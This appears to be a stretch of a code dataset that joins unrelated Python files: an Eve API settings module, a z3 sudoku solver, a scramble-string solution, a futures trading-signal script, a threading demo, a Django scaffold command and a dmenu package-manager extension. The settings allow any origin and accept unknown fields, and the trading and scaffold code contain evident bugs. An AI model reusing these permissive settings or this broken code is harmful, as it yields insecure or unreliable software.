False\nDOMAIN['file_sec_action']['schema']['scan_disguise']['required'] = False\n\nDOMAIN['file_filter']['schema']['op_negative']['required'] = False\n\nDOMAIN['app_sec_action']['schema']['imon_scan_accessibility']['required'] = False\nDOMAIN['app_sec_action']['schema']['imon_scan_accuracy']['required'] = False\nDOMAIN['app_sec_action']['schema']['imon_scan_timeliness']['required'] = False\nDOMAIN['app_sec_action']['schema']['imon_scan_extlink']['required'] = False\nDOMAIN['app_sec_action']['schema']['iwall_action_block']['required'] = False\nDOMAIN['app_sec_action']['schema']['iwall_cata_attack_tech']['required'] = False\nDOMAIN['app_sec_action']['schema']['iwall_cata_sensitive_obj']['required'] = False\nDOMAIN['app_sec_action']['schema']['iwall_cata_restricted_protocol']['required'] = False\n\nDOMAIN['ilocker_rule']['schema']['cmdline']['required'] = False\nDOMAIN['ilocker_rule']['schema']['username']['required'] = False\nDOMAIN['ilocker_rule']['schema']['exe_path']['required'] = False\nDOMAIN['ilocker_rule']['schema']['action_snapshot']['required'] = False\nDOMAIN['ilocker_rule']['schema']['phase']['required'] = False\nDOMAIN['ilocker_rule']['schema']['phase_order_id']['required'] = False\nDOMAIN['ilocker_rule']['schema']['ignore_case']['required'] = False\nDOMAIN['ilocker_rule']['schema']['deleted']['required'] = False\n\n# dynamic relation cannot be json serialized\nDOMAIN['server']['datasource']['projection']['module_info'] = 
0\nDOMAIN['server']['datasource']['projection']['midware_info'] = 0\nDOMAIN['server']['datasource']['projection']['tasks_isync'] = 0\nDOMAIN['server']['datasource']['projection']['tasks_staging'] = 0\nDOMAIN['server']['datasource']['projection']['config_files'] = 0\nDOMAIN['server']['datasource']['projection']['ilocker_rules'] = 0\nDOMAIN['server']['datasource']['projection']['log_rules'] = 0\nDOMAIN['server']['datasource']['projection']['snapshots'] = 0\nDOMAIN['server']['datasource']['projection']['app_sec_action'] = 0\n\nDOMAIN['site']['datasource']['projection']['ilocker_rules'] = 0\nDOMAIN['site']['datasource']['projection']['app_sec_action'] = 0\nDOMAIN['site']['datasource']['projection']['tasks'] = 0\nDOMAIN['site']['schema']['servers']['schema']['data_relation']['embeddable'] = True\nDOMAIN['site']['schema']['file_assets']['schema']['data_relation']['embeddable'] = True\nDOMAIN['site']['schema']['owner']['data_relation']['embeddable'] = True\n\nDOMAIN['midware_info']['datasource']['projection']['ilocker_rules'] = 0\n\n# DOMAIN['file_asset']['datasource']['projection']['sec_actions'] = 0\nDOMAIN['file_asset']['datasource']['projection']['trusted_sync_filters'] = 0\nDOMAIN['file_asset']['datasource']['projection']['ilocker_rules'] = 0\n\nDOMAIN['file_sec_action']['datasource']['projection']['file_filters'] = 0\n\n# embedded resource\nDOMAIN['file_asset']['schema']['sec_actions']['schema']['data_relation']['embeddable'] = True\nDOMAIN['file_asset']['schema']['server']['data_relation']['embeddable'] = True\nDOMAIN['file_asset']['schema']['site']['data_relation']['embeddable'] = True\n\nDOMAIN['snapshot']['schema']['server']['data_relation']['embeddable'] = True\n\nDOMAIN['server']['schema']['os_info']['data_relation']['embeddable'] = True\nDOMAIN['server']['schema']['owner']['data_relation']['embeddable'] = True\nDOMAIN['server']['schema']['sites']['schema']['data_relation']['embeddable'] = True\nDOMAIN['server']['schema']['file_assets']['schema']['data_relation']['embeddable'] = True\n\n# methods\nDOMAIN['task']['item_methods'] = ['GET']\n\nDATE_FORMAT = '%Y-%m-%d %H:%M:%S'\n\nRENDERERS = [\n 'eve.render.JSONRenderer',\n]\nHATEOAS = False\n\n# API_VERSION = 'v1'\n\nRESOURCE_METHODS = ['GET', 'POST', 'DELETE']\nITEM_METHODS = ['GET', 'PUT', 'PATCH', 'DELETE']\nIF_MATCH = False # disable etag\n\nALLOW_UNKNOWN = True # for user.password_hash updated by password\n\nX_DOMAINS = '*'\nX_HEADERS = '*'\n\nOPLOG = True\nOPLOG_NAME = 'OpLog'\nOPLOG_ENDPOINT = 'OpLog'\nOPLOG_RETURN_EXTRA_FIELD = True\nOPLOG_METHODS = ['DELETE', 'POST', 'PATCH', 'PUT', 'GET']\n\nURL_PREFIX = 'api'\n\nINSTALLER_DIR = os.path.join(MY_ROOT_DIR, 'installer')\nVAULT_DIR = os.path.join(MY_ROOT_DIR, 'vault')\nSTATIC_FOLDER = os.path.join(MY_ROOT_DIR, 'static')\n\nPEM_FILE = None\nPEM_PASSWORD = None\n\nSERVER_CONFIG = {\n 'bind': '0.0.0.0:5000',\n 'workers': 2,\n 'daemon': True,\n 'pid': os.path.join(MY_ROOT_DIR, 'log', 'web.pid'),\n 'graceful-timeout': 3,\n}\n\n\ndef load_conf(conf_file):\n try:\n with open(conf_file, 'r') as f:\n return json.load(f)\n except Exception as e:\n print(e)\n return {}\n\n\n# update config from config file\n_conf_file = os.path.join(MY_ROOT_DIR, 'conf', 'web.json')\n_d_conf = load_conf(_conf_file)\nPEM_FILE = _d_conf.get('pem_file', PEM_FILE)\nPEM_PASSWORD = _d_conf.get('pem_password', PEM_PASSWORD)\nSERVER_CONFIG.update(_d_conf.get('server', {}))\n\nWSS_CONFIG = {\n 'address': '127.0.0.1',\n 'port': 36666,\n}\n\n_conf_file = os.path.join(MY_ROOT_DIR, 'conf', 'wsserver.json')\n_d_conf = 
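These settings are consumed by an Eve application elsewhere in the project; the bootstrap that eve-sqlalchemy documents looks roughly like the sketch below (the module names are assumptions, e.g. that models.all exposes the declarative Base):

from eve import Eve
from eve_sqlalchemy import SQL
from eve_sqlalchemy.validation import ValidatorSQL
from models.all import Base  # assumed export

app = Eve(validator=ValidatorSQL, data=SQL)  # reads settings.py by default
db = app.data.driver
Base.metadata.bind = db.engine  # bind the declarative models to Eve's engine
db.Model = Base
db.create_all()

if __name__ == '__main__':
    app.run()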
load_conf(_conf_file)\nWSS_CONFIG.update(_d_conf)\nif WSS_CONFIG['address'] == '0.0.0.0' or WSS_CONFIG['address'] == '*':\n WSS_CONFIG['address'] = '127.0.0.1'\n","sub_path":"api/common/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":8182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"566993616","text":"#!/usr/bin/python\nimport math\n\ndef mkSameLen(num1,num2):\n '''\n Given two numbers of different length, this function pads zeros\n to the smaller number and returns the numbers\n '''\n \n l1 = len(num1)\n l2 = len(num2)\n diff = abs(l1-l2)\n if(l1 \",\n completer=completer,\n )\n else:\n an_input = input(f\"{get_flair()} (fred)> \")\n try:\n process_input = fred_controller.switch(an_input)\n\n if process_input is not None:\n return process_input\n\n except SystemExit:\n print(\"The command selected doesn't exist\\n\")\n continue\n","sub_path":"gamestonk_terminal/fred/fred_controller.py","file_name":"fred_controller.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"20151443","text":"\"\"\"\nGiven a string s1, we may represent it as a binary tree by partitioning it to\ntwo non-empty substrings recursively.\n\"\"\"\n\nclass Solution(object):\n def __init__(self):\n self.dic = {}\n\n def isScramble(self, s1, s2):\n if (s1, s2) in self.dic:\n return self.dic[(s1, s2)]\n if len(s1) != len(s2) or sorted(s1) != sorted(s2): # prunning\n self.dic[(s1, s2)] = False\n return False\n if s1 == s2:\n self.dic[(s1, s2)] = True\n return True\n for i in range(1, len(s1)):\n if (self.isScramble(s1[:i], s2[:i]) and self.isScramble(s1[i:], s2[i:])) or \\\n (self.isScramble(s1[:i], s2[-i:]) and self.isScramble(s1[i:], s2[:-i])):\n return True\n self.dic[(s1, s2)] = False\n return False\n\n def isScramble2(self, s1, s2):\n \"\"\"\n :type s1: str\n :type s2: str\n :rtype: bool\n \"\"\"\n if s1 == s2:\n return True\n\n n = len(s1)\n count = [0] * 26\n for i in range(n):\n count[ord(s1[i])- 97] += 1\n count[ord(s2[i]) - 97] -= 1\n\n if any(count):\n return False\n\n for i in range(1, n):\n if self.isScramble2(s1[:i], s2[:i]) and self.isScramble2(s1[i:], s2[i:]):\n return True\n if self.isScramble2(s1[:i], s2[n-i:]) and self.isScramble2(s1[i:], s2[:n-i]):\n return True\n\n return False\n\ns1 = \"great\"\ns2 = \"rgeat\" # True\n# s1 = \"abcde\"\n# s2 = \"caebd\" # False\nprint(Solution().isScramble2(s1, s2))\n","sub_path":"87ScrambleStr.py","file_name":"87ScrambleStr.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"250612262","text":"from z3 import *\n\n\ns = Solver()\n\nvalues = [[Int(f's_{x}_{y}') for y in range(9)] for x in range(9)]\n\nproblem = '4.....8.5.3..........7......2.....6.....8.4......1.......6.3.7.5..2.....1.4......'\n\nassert (len(problem) == 81)\n\nfor y in range(9):\n for x in range(9):\n\n # Index out of our problem string\n val = problem[x + 9 * y]\n\n # Constrain range\n if val in '123456789':\n s.add(values[x][y] == int(val))\n\n else:\n s.add(And(values[x][y] <= 9, values[x][y] >= 1))\n\n# Rows must have unique values\nfor row in range(9):\n s.add(Distinct(\n [values[col][row] for col in range(9)]\n ))\n\n# Same with columns\nfor col in range(9):\n s.add(Distinct(\n [values[col][row] for row in range(9)]\n ))\n\n# Constrain boxes\n# x, y are the upper left corner of each box\n# and we then add every pair of (0, 
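The Solution class above memoizes isScramble through a hand-rolled self.dic; functools.lru_cache expresses the same memoized recurrence more idiomatically (a sketch, not the original author's code):

from functools import lru_cache

@lru_cache(maxsize=None)
def is_scramble(s1, s2):
    if s1 == s2:
        return True
    # Prune: a scramble must be an anagram of the same length.
    if len(s1) != len(s2) or sorted(s1) != sorted(s2):
        return False
    for i in range(1, len(s1)):
        # Either the split is kept in order, or the two halves are swapped.
        if (is_scramble(s1[:i], s2[:i]) and is_scramble(s1[i:], s2[i:])) or \
           (is_scramble(s1[:i], s2[-i:]) and is_scramble(s1[i:], s2[:-i])):
            return True
    return False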
1, 2) to them\n# to get the full box\nfor x in range(0, 9, 3):\n for y in range(0, 9, 3):\n s.add(Distinct(\n [values[x + i][y + j] for i in range(3) for j in range(3)]\n ))\n\nsolutions = 0\n\nwhile s.check() == sat:\n\n # Pretty print solution\n for y in range(9):\n for x in range(9):\n\n print('%s ' % s.model()[values[x][y]], end='')\n\n # Vertical box seperatators!\n if x in [2, 5]:\n print('| ', end='')\n\n print()\n if y in [2, 5]:\n print('------+-------+------')\n\n print()\n\n s.add(Or([values[x][y] != s.model()[values[x][y]] for x in range(9) for y in range(9)]))\n\n solutions += 1\n\nif (solutions > 0):\n print('Found %s solutions!' % solutions)\n\nelse:\n print('Found no solutions!')\n","sub_path":"sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"398428614","text":"import CrazyCod.Utilities.cartrules as crtr\nimport CrazyCod.Utilities.filters3 as filt\n\nimport CrazyCod.Futures.Collect.OldWork.step4_get_returns as s4gr\nimport CrazyCod.Utilities.Old_Work.drawchart2 as drch2\nfrom CrazyCod.Futures.folder import *\nfrom CrazyCod.Utilities.pkgstdy import *\n\nUnCorrUniv = [s4gr._f1_SP500, s4gr._f01_CrudeWTI, s4gr._f01_Wheat, s4gr._f01_Gold, s4gr._f01_Copper, s4gr._f1_USLBond,\n s4gr._f01_LCattle, s4gr._f01_LeanHogs, s4gr._f01_Sugar, s4gr._f01_Cocoa, s4gr._f01_Coffee, s4gr._f01_Milk,\n s4gr._f01_Cotton, s4gr._f01_FCOJ, s4gr._f01_RoughRice, s4gr._f01_Lumber, s4gr._f01_CoalRot,\n s4gr._f1_IndRupee, s4gr._f01_DryMilk, s4gr._f01_Butter, s4gr._f01_NatGas]\n\n\ndef _return_bands(lr1a, trm):\n trm1 = (2*trm+1)/3\n trm2 = (3*trm-1)/2\n x = np.log(lr1a)\n trs = filt.ema(x, trm)\n trw = filt.ema(x, trm1)\n trg = filt.ema(x, trm2)\n trcov = 3*((trm+1)/(trm-1))*np.power(trw-trs, 2)\n trcov1 = 3*((trm2+1)/(trm2-1))*np.power(trs-trg, 2)\n terr = np.sqrt(filt.ema(np.power(x, 2), trm)-np.power(trs, 2)-trcov)\n terr1 = np.sqrt(filt.ema(np.power(x, 2), trm2)-np.power(trg, 2)-trcov1)\n terr2 = np.exp(3*np.log(terr)-2*np.log(terr1))\n return terr2\n\ni = 9\nfig_data = mkt_retrieve(UnCorrUniv[i].crname, 'Stats', 'Returns')[['Date', 'Open', 'High', 'Low', 'Close']]\n\nfig_data['Lrma20'] = filt.smth_price0(fig_data['Open'].values, fig_data['Close'].values, 17, 17, 32, 37, 19) # f2\n_tmp = filt.smth_price0_ohlc(np.ascontiguousarray(fig_data[['Open', 'High', 'Low', 'Close']].values), 17, 17, 32, 37, 19)\n_tmp_ss = filt.smth_price0(np.ascontiguousarray(_tmp[:, 0]), np.ascontiguousarray(_tmp[:, 3]), 3, 3, 6, 24, 16)\n\n# this one hugs too much\nfig_data['LrmaNew'] = filt.smth_price0(fig_data['Open'].values, fig_data['Close'].values, 26, 35, 50, 61, 35)\n\n# fig_data['Lrma20g'] = np.sign(filt.chg(fig_data['Lrma20'].values))\nfig_data['Lrma20g'] = np.sign(filt.chg(_tmp_ss)) # _stmp_sig\n\nfig_data['Lrma20_256'] = filt.lrma(fig_data['Lrma20'].values, 256, lg=True) # s4\n_ltmp = filt.lrma_ohlc(_tmp, 256, lg=True)\n_lerr = _return_bands(_ltmp[:, 3], 128) # e0\n\n#### - use t0\nfig_data['Lrma20_256e'] = filt.ema(fig_data['Lrma20_256'].values, 50)\nfig_data['Lrma20_256g'] = np.sign(_ltmp[:, 3] - fig_data['Lrma20_256e'].values) # t0\n\n#### - use t2\n# _ltmp_ss = filt.smth_price0_ohlc(_ltmp, 3, 3, 27, 30, 3)\n# fig_data['Lrma20_256g'] = np.sign(filt.chg(np.ascontiguousarray(_ltmp_ss[:, 3]))) # t2\n\n# _trlrma20_256_err = _return_bands(fig_data['Lrma20_256'].values, 256)\n\nfig_data['Lrma20_256_u'] = np.exp(np.log(fig_data['Lrma20_256'].values) + _lerr * 3) # b3\nfig_data['Lrma20_256_d'] 
= np.exp(np.log(fig_data['Lrma20_256'].values) - _lerr * 3)\n\nfig_data['Combo_g'] = crtr.cart1(fig_data['Lrma20'].values, fig_data['Lrma20g'].values,\n fig_data['Lrma20_256g'].values, fig_data['Lrma20_256_u'].values,\n fig_data['Lrma20_256_d'].values)\n\n# _test = filt.smth_price0_ohlc(np.ascontiguousarray(fig_data[['Open', 'High', 'Low', 'Close']].values),\n# 13, 15, 25, 30, 9)\n# fig_data['SmthOpen'] = _test[:, 0]\n# fig_data['SmthHigh'] = _test[:, 1]\n# fig_data['SmthLow'] = _test[:, 2]\n# fig_data['SmthClose'] = _test[:, 3]\n#\n# fig_data['DLrma2020'] = filt.smth_price0(fig_data['SmthOpen'].values, fig_data['SmthClose'].values, 3, 3, 11, 36, 3)\n# fig_data['DLrma2020g'] = np.sign(filt.chg(fig_data['DLrma2020'].values))\n#\n# fig_data['DLrma2006'] = filt.smth_price0(fig_data['SmthOpen'].values, fig_data['SmthClose'].values, 3, 3, 6, 24, 16)\n# fig_data['DLrma2006g'] = np.sign(filt.chg(fig_data['DLrma2006'].values))\n\n# do a new smooth filter parameter search, which maximizes reduction of changes, while minimizing distance\n# currently the overshoot is very high when applied to Lrma20\n\n# calculate the returns (convert this to Cython code)\n_ny = filt.fst_nan(fig_data['Combo_g'].values)+1\n_n = fig_data.shape[0]\nfor i in ['StratOpen', 'StratHigh', 'StratLow', 'StratClose']:\n fig_data[i] = np.nan\nfor i in range(_ny, _n):\n if i == _ny:\n fig_data[i, 'StratOpen'] = 100 * (1 + (fig_data[i, 'Open'] / fig_data[i - 1, 'Close'] - 1) *\n fig_data[i - 1, 'Combo_g'])\n fig_data[i, 'StratHigh'] = 100 * (1 + (fig_data[i, 'High'] / fig_data[i - 1, 'Close'] - 1) *\n fig_data[i - 1, 'Combo_g'])\n fig_data[i, 'StratLow'] = 100 * (1 + (fig_data[i, 'Low'] / fig_data[i - 1, 'Close'] - 1) *\n fig_data[i - 1, 'Combo_g'])\n fig_data[i, 'StratClose'] = 100 * (1 + (fig_data[i, 'Close'] / fig_data[i - 1, 'Close'] - 1) *\n fig_data[i - 1, 'Combo_g'])\n else:\n fig_data[i, 'StratOpen'] = fig_data[i-1, 'StratClose'] * (1 + (\n fig_data[i, 'Open'] / fig_data[i - 1, 'Close'] - 1) * fig_data[i - 1, 'Combo_g'])\n fig_data[i, 'StratHigh'] = fig_data[i-1, 'StratClose'] * (1 + (\n fig_data[i, 'High'] / fig_data[i - 1, 'Close'] - 1) * fig_data[i - 1, 'Combo_g'])\n fig_data[i, 'StratLow'] = fig_data[i-1, 'StratClose'] * (1 + (\n fig_data[i, 'Low'] / fig_data[i - 1, 'Close'] - 1) * fig_data[i - 1, 'Combo_g'])\n fig_data[i, 'StratClose'] = fig_data[i-1, 'StratClose'] * (1 + (\n fig_data[i, 'Close'] / fig_data[i - 1, 'Close'] - 1) * fig_data[i - 1, 'Combo_g'])\n\n# fig_info = [{'Chart': 'Bar', 'Lines': ['Lrma20', 'Lrma20_256', 'Lrma20_256e', 'Lrma20_256_u', 'Lrma20_256_d',\n# 'LrmaNew']}, #\n# {'Lines': ['Lrma20g']}, {'Lines': ['Lrma20_256g']}, {'Lines': ['Combo_g']},\n# {'Chart': 'Bar', 'ChartDataCols': ['StratOpen', 'StratHigh', 'StratLow', 'StratClose']}]\n\n# fig_info = [{'Chart': 'Bar', 'Lines': ['Lrma20', 'Lrma20_256', 'Lrma20_256_u', 'Lrma20_256_d']},\n# {'Lines': ['Lrma20g']},\n# {'Chart': 'Bar', 'ChartDataCols': ['SmthOpen', 'SmthHigh', 'SmthLow', 'SmthClose'],\n# 'Lines': ['DLrma2020', 'DLrma2006']}, {'Lines': ['DLrma2020g']}, {'Lines': ['DLrma2006g']}]\n\nfig_info = [{'Chart': 'Bar', 'Lines': ['Lrma20', 'Lrma20_256', 'Lrma20_256e', 'LrmaNew']},{'Lines': ['Lrma20_256g']}] #\n\n\ndrch2.draw_chart(fig_info, fig_data, years=20)\n\n# couple of problems: slow lrma might get delayed\n# ema of 25 can make it whipsaw\n# problem time-periods:\n# Sep-1998: lrma is too delayed\n# 2000: lrma vs ema of lrma gets whipsawed\n# post-Jul-2000: switching to st-trend doesn't work\n# 2006: trend goes back up, but lrma takes a 
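A note on the returns loop here (flagged in the source for a Cython rewrite): fig_data[i, 'Open'] asks pandas for a column labelled with the tuple (i, 'Open'), so the right-hand sides raise KeyError, and the assignments would create tuple-named columns rather than filling rows. Scalar row/column access needs .at (or .loc). A corrected fragment for the first bar, assuming the frame keeps its default RangeIndex so positions and labels coincide:

prev_close = fig_data.at[i - 1, 'Close']
prev_sig = fig_data.at[i - 1, 'Combo_g']
fig_data.at[i, 'StratOpen'] = 100 * (1 + (fig_data.at[i, 'Open'] / prev_close - 1) * prev_sig)
fig_data.at[i, 'StratClose'] = 100 * (1 + (fig_data.at[i, 'Close'] / prev_close - 1) * prev_sig)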
while to turn around\n# Nov-2008: st-trend gets whipsawed a lot\n# never gives a st_trend on the above, always on the bottom\n\n# give a small band around ema to avoid it from being whipsawed\n\n# Need to fix LRMA, and its trend\n# faster Trend can be fixed and made smooth by using 2-day, 3-day etc\n\n# need to measure # of chgs for a super fast signal, and use that to decide\n# if we want to use it as a multiplier\n\n# need to fix bands","sub_path":"CrazyCod/Futures/Models/SwitchingOld/Old_Work/test_switching_algo.py","file_name":"test_switching_algo.py","file_ext":"py","file_size_in_byte":7075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"496266745","text":"from Queue import Queue\nfrom threading import Thread, current_thread\nimport time\n\nnum = 5\nq = Queue()\ndata = list(range(30))\n\ndef worker():\n while True:\n number = q.get()\n print (\"{} -> Number: {} \".format(current_thread().name, number))\n time.sleep(0.1)\n q.task_done()\n\nfor i in range(num):\n t = Thread(name=\"Thread {}\".format(i), target=worker)\n t.daemon = True\n t.start()\n\ndef add():\n for i in range(num):\n time.sleep(0.5)\n q.put(i)\n\nadd()\nq.join()\n","sub_path":"python/queue_thread.py","file_name":"queue_thread.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"41140540","text":"from django.core.management.base import BaseCommand, CommandError, LabelCommand, copy_helper\n\nimport os\n\nfrom django.utils.importlib import import_module\n\nclass Command(LabelCommand):\n help = \"Creates scaffold for basic CRUD for the given model in the given app name in this project's directory.\"\n args = \"[modelname,appname]\"\n label = 'model name'\n\n requires_model_validation = False\n # Can't import settings during this command, because they haven't\n # necessarily been created.\n can_import_settings = False\n\n def handle_label(self, model_name, app_name, directory=None, **options):\n if directory is None:\n directory = os.getcwd()\n\n # Determine the project_name by using the basename of directory,\n # which should be the full path of the project directory (or the\n # current directory if no directory was passed).\n project_name = os.path.basename(directory)\n\n # Check that the app_name exists.\n try:\n import_module(app_name)\n except ImportError:\n raise CommandError(\"%r does not appear to be an app in this project. 
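queue_thread.py above is Python 2 (the Queue module was renamed queue in Python 3), and its data list of 30 numbers is never used: add() enqueues only num == 5 items. A Python 3 version that presumably matches the intent:

import time
from queue import Queue
from threading import Thread, current_thread

q = Queue()

def worker():
    while True:
        number = q.get()
        print("{} -> Number: {}".format(current_thread().name, number))
        time.sleep(0.1)
        q.task_done()  # lets q.join() account for this item

for i in range(5):
    Thread(name="Thread {}".format(i), target=worker, daemon=True).start()

for number in range(30):  # enqueue the full data set, not just 5 items
    q.put(number)
q.join()  # block until every queued item has been marked done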
Did you spell it correctly?\" % app_name)\n\n # Check that the model_name exists\n #try:\n \n import_module(app_name)\n fields = app_name.model_name._meta.fields\n\nclass ProjectCommand(Command):\n help = (\"Creates scaffold for basic CRUD for the given model in the given app name in this project's directory.\")\n\n def __init__(self, project_directory):\n super(ProjectCommand, self).__init__()\n self.project_directory = project_directory\n\n def handle_label(self, app_name, model_name, **options):\n super(ProjectCommand, self).handle_label(app_name, model_name, self.project_directory, **options)\n","sub_path":"mysite/scaffolder/management/commands/scaffold.py","file_name":"scaffold.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"131611876","text":"# -*- coding: utf8 -*-\nimport dmenu_extended\nimport os\n\n\nclass extension(dmenu_extended.dmenu):\n\n title = 'System package management'\n is_submenu = True\n detected_packageManager = False\n\n def __init__(self):\n self.load_preferences()\n self.cache_packages = dmenu_extended.path_cache + '/packages.txt'\n\n # Determine package manager\n if os.path.exists('/usr/bin/apt-get'):\n # We are Debian based\n self.command_installPackage = 'sudo apt-get install '\n self.command_removePackage = 'sudo apt-get remove '\n self.command_listInstalled = ['dpkg', '-l']\n self.command_listAvailable = ['apt-cache', 'search', '']\n self.command_systemUpdate = 'sudo apt-get update && sudo apt-get upgrade'\n self.detected_packageManager = 'apt-get'\n elif os.path.exists('/usr/bin/yum'):\n # We are Red Hat based\n self.command_installPackage = 'sudo yum install '\n self.command_removePackage = 'sudo yum remove '\n self.command_listInstalled = 'yum list installed'\n self.command_listAvailable = [\"yum\", \"search\", \"\"]\n self.command_systemUpdate = 'sudo yum update'\n self.detected_packageManager = 'yum'\n elif os.path.exists('/usr/bin/dnf'):\n self.command_installPackage = 'sudo dnf install '\n self.command_removePackage = 'sudo dnf remove '\n self.command_listInstalled = 'dnf list installed'\n self.command_listAvailable = [\"dnf\", \"search\", \"\"]\n self.command_systemUpdate = 'sudo dnf update'\n self.detected_packageManager = 'dnf'\n elif os.path.exists('/usr/bin/pacman'):\n # We are Arch based\n self.command_installPackage = 'sudo pacman -S '\n self.command_removePackage = 'sudo pacman -R '\n self.command_listInstalled = 'pacman -Q'\n self.command_listAvailable = 'pacman -Ss'\n self.command_systemUpdate = 'sudo pacman -Syu'\n self.detected_packageManager = 'pacman'\n elif os.path.exists('/usr/bin/emerge'):\n # We are Gentoo based\n self.command_installPackage = 'sudo emerge '\n self.command_removePackage = 'sudo emerge --unmerge '\n self.command_listInstalled = 'cd /var/db/pkg/ && ls -d */* | sed \\'s/\\-[0-9].*$//\\' > ' + dmenu_extended.path_cache + '/tmp.txt'\n self.command_listAvailable = 'emerge --search \"\" | grep \"* \" | cut -c 4- | sed \"s/\\[ Masked \\]//g\" | sed -n \\'/^app-accessibility/,$p\\' > ' + dmenu_extended.path_cache + '/tmp.txt'\n self.command_systemUpdate = 'sudo emerge --sync && sudo emerge -uDv @world'\n self.detected_packageManager = 'portage'\n\n def install_package(self):\n packages = self.cache_open(self.cache_packages)\n\n if packages == False:\n self.menu('No package database exists. 
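The model_name check in scaffold.py above is left as a stub: the try is commented out, and app_name.model_name._meta.fields would fail because app_name is a string. In the Django generation this file targets (it still imports copy_helper), the lookup would go through the old app loader; a hedged sketch of how that check could be completed:

from django.db.models.loading import get_model  # pre-Django-1.7 loader

model = get_model(app_name, model_name)  # returns None if no such model
if model is None:
    raise CommandError("%r has no model named %r. Did you spell it "
                       "correctly?" % (app_name, model_name))
fields = model._meta.fields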
Press enter to build cache')\n            self.build_package_cache()\n            packages = self.cache_open(self.cache_packages)\n\n        package = self.menu(packages, prompt=\"Install:\")\n\n        if len(package) > 0:\n            self.open_terminal(self.command_installPackage + package.split(' ')[0], True)\n            self.rebuild_notice()\n\n    def remove_package(self):\n        self.message_open('Collecting list of installed packages')\n        if self.detected_packageManager == 'apt-get':\n            packages = self.installedPackages_aptget()\n        elif self.detected_packageManager == 'yum':\n            packages = self.installedPackages_yum()\n        elif self.detected_packageManager == 'dnf':\n            packages = self.installedPackages_dnf()\n        elif self.detected_packageManager == 'pacman':\n            packages = self.installedPackages_pacman()\n        elif self.detected_packageManager == 'portage':\n            packages = self.u_installedPackages_portage()\n\n        self.message_close()\n\n        package = self.select(packages, prompt=\"Uninstall:\")\n        if package != -1:\n            self.open_terminal(self.command_removePackage + package, True)\n            self.rebuild_notice()\n\n    def update_package(self):\n        self.message_open('Collecting list of installed packages')\n\n        if self.detected_packageManager == 'apt-get':\n            packages = self.installedPackages_aptget()\n        elif self.detected_packageManager == 'yum':\n            packages = self.installedPackages_yum()\n        elif self.detected_packageManager == 'dnf':\n            packages = self.installedPackages_dnf()\n        elif self.detected_packageManager == 'pacman':\n            packages = self.installedPackages_pacman()\n        elif self.detected_packageManager == 'portage':\n            packages = self.installedPackages_portage()\n\n        self.message_close()\n\n        package = self.select(packages, prompt=\"Update:\")\n        if package != -1:\n            self.open_terminal(self.command_installPackage + package, True)\n\n    def build_package_cache(self, message=True):\n        if message:\n            self.message_open('Building package cache')\n\n        if self.detected_packageManager == 'apt-get':\n            packages = self.availablePackages_aptget()\n        elif self.detected_packageManager == 'yum':\n            packages = self.availablePackages_yum()\n        elif self.detected_packageManager == 'dnf':\n            packages = self.availablePackages_dnf()\n        elif self.detected_packageManager == 'pacman':\n            packages = self.availablePackages_pacman()\n        elif self.detected_packageManager == 'portage':\n            packages = self.availablePackages_portage()\n\n        self.cache_save(packages, self.cache_packages)\n        if message:\n            self.message_close()\n            self.menu(\"Package cache built\")\n\n    def update_system(self):\n        self.open_terminal(self.command_systemUpdate, True)\n\n    def installedPackages_aptget(self):\n        packages = self.command_output(self.command_listInstalled)\n        out = []\n        for package in packages:\n            tmp = package.split()\n            if len(tmp) > 6:\n                out.append(tmp[1])\n        return sorted(set(out))\n\n    def installedPackages_yum(self):\n        packages = self.command_output(self.command_listInstalled)\n        return sorted(set(packages))\n    \n    def installedPackages_dnf(self):\n        packages = self.command_output(self.command_listInstalled)\n        return sorted(set(packages))\n\n    def installedPackages_pacman(self):\n        packages = self.command_output(self.command_listInstalled)\n        out = []\n        for package in packages:\n            if len(package) > 0 and package[0] != \" \":\n                out.append(package.split(' ')[0])\n        return sorted(set(out))\n\n    def installedPackages_portage(self):\n        os.system(self.command_listInstalled)\n        packages = self.command_output('cat ' + dmenu_extended.path_cache + '/tmp.txt')\n
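        # A safer, shell-free equivalent of the os.system() cleanup below, as a
        # sketch (assumes Python >= 3.5; same cache file path):
        #   import subprocess
        #   subprocess.run(['rm', dmenu_extended.path_cache + '/tmp.txt'], check=False)
        os.system('rm ' + dmenu_extended.path_cache + 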
'/tmp.txt')\n        return packages\n\n    def u_installedPackages_portage(self):\n        os.system('cd /var/db/pkg/ && ls -d */* > ' + dmenu_extended.path_cache + '/tmp.txt')\n        packages = self.command_output('cat ' + dmenu_extended.path_cache + '/tmp.txt')\n        os.system('rm ' + dmenu_extended.path_cache + '/tmp.txt')\n        return packages\n\n    def availablePackages_aptget(self):\n        packages = self.command_output(self.command_listAvailable)\n        packages.sort()\n        return packages\n\n    def availablePackages_yum(self):\n        packages = self.command_output(self.command_listAvailable)\n        out = []\n        last = \"\"\n        for package in packages:\n            tmp = package.split( ' : ' )\n            if len(tmp) > 1:\n                if tmp[0][0] == \" \":\n                    last += \" \" + tmp[1]\n                else:\n                    out.append(last)\n                    last = tmp[0].split('.')[0] + ' - ' + tmp[1]\n\n        out.append(last)\n        return sorted(set(out[1:]))\n    \n    def availablePackages_dnf(self):\n        packages = self.command_output(self.command_listAvailable)\n        out = []\n        last = \"\"\n        for package in packages:\n            tmp = package.split( ' : ' )\n            if len(tmp) > 1:\n                if tmp[0][0] == \" \":\n                    last += \" \" + tmp[1]\n                else:\n                    out.append(last)\n                    last = tmp[0].split('.')[0] + ' - ' + tmp[1]\n\n        out.append(last)\n        return sorted(set(out[1:]))\n\n    def availablePackages_pacman(self):\n        packages = self.command_output(self.command_listAvailable)\n        out = []\n        last = \"\"\n        for package in packages:\n            if package != \"\":\n                if package[0:3] == \" \":\n                    last += \" - 